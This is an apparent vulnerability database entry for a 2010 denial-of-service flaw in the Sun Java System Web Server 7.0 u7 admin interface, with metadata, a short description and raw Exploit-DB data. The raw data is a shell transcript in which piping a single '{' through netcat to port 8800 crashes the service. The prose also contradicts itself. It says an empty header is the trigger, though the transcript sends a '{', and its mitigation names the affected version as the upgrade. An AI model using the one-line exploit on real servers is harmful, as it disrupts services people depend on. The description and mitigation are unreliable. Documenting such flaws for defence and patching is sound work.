Vendor: Java System Web Server
By: Unknown
CVSS: 7.5 (HIGH)
Denial of Service (DoS)
CWE: 400
Product Name: Java System Web Server
Affected Version From: 7.0 u7
Affected Version To: 7.0 u7
Patch Exists: Yes
Related CWE: N/A
CPE: a:sun:java_system_web_server:7.0u7
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2010

Sun Java Web Server 7.0 u7 Admin Interface DOS

A Denial of Service (DoS) vulnerability exists in the admin interface of Sun Java Web Server 7.0 u7. An attacker can cause a denial of service by sending a specially crafted HTTP request. The request must contain an empty HTTP header, which causes the server to crash. In the transcript below, the crash shows up as the admin port refusing new connections after the request is sent.

Mitigation:

Upgrade to the latest version of Sun Java Web Server 7.0 u7 or later.

Exploit-DB raw data:

# Sun Java Web Server 7.0 u7 Admin Interface DOS

# Software Package sjsws-7_0u7-windows-i586.zip 4fb8d1fb700d5649234a2891a4ecedea
# While attempting to verify http://www.exploit-db.com/exploits/14194/ (which was not verified),
# I stumbled across this semi amusing DOS:

root@bt:~# nc -nv 192.168.48.134 8800
(UNKNOWN) [192.168.48.134] 8800 (?) open
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Tue, 06 Jul 2010 00:22:50 GMT
Content-type: text/html
Last-modified: Tue, 06 Jul 2010 00:18:00 GMT
Content-length: 465
Etag: "1d1-4c327638"
Accept-ranges: bytes
Connection: close

root@bt:~# echo { |nc -nv 192.168.48.134 8800
(UNKNOWN) [192.168.48.134] 8800 (?) open
root@bt:~# echo { |nc -nv 192.168.48.134 8800
(UNKNOWN) [192.168.48.134] 8800 (?) : Connection refused
root@bt:~#